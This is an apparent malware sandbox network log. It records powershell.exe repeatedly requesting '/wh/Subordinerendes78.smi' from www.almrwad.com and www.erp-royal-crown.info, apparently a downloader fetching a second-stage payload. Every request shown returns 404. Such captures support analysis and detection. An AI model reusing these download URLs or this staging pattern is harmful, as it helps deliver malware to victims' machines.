2024-12-05 09:41:58 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:41:58 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49737 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:42:04 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:42:04 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:42:04 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:42:04 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 148.251.114.233 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:42:10 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:42:10 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:42:10 GMT
server: LiteSpeed
2024-12-05 09:42:10 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:42:10 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:42:15 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:42:16 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:42:16 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:42:16 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49742 | 148.251.114.233 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:42:21 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:42:22 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:42:22 GMT
server: LiteSpeed
2024-12-05 09:42:22 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:42:22 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49743 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:42:27 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:42:28 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:42:28 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:42:28 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49744 | 148.251.114.233 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:42:33 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:42:34 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:42:33 GMT
server: LiteSpeed
2024-12-05 09:42:34 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:42:34 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49746 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:42:39 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:42:40 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:42:40 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:42:40 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49758 | 148.251.114.233 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:42:45 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:42:46 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:42:45 GMT
server: LiteSpeed
2024-12-05 09:42:46 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:42:46 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49774 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:42:51 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:42:51 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:42:51 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:42:51 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49786 | 148.251.114.233 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:42:57 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:42:57 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:42:57 GMT
server: LiteSpeed
2024-12-05 09:42:57 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:42:57 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49801 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:43:03 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:43:03 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:43:03 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:43:03 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49817 | 148.251.114.233 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:43:08 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:43:09 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:43:09 GMT
server: LiteSpeed
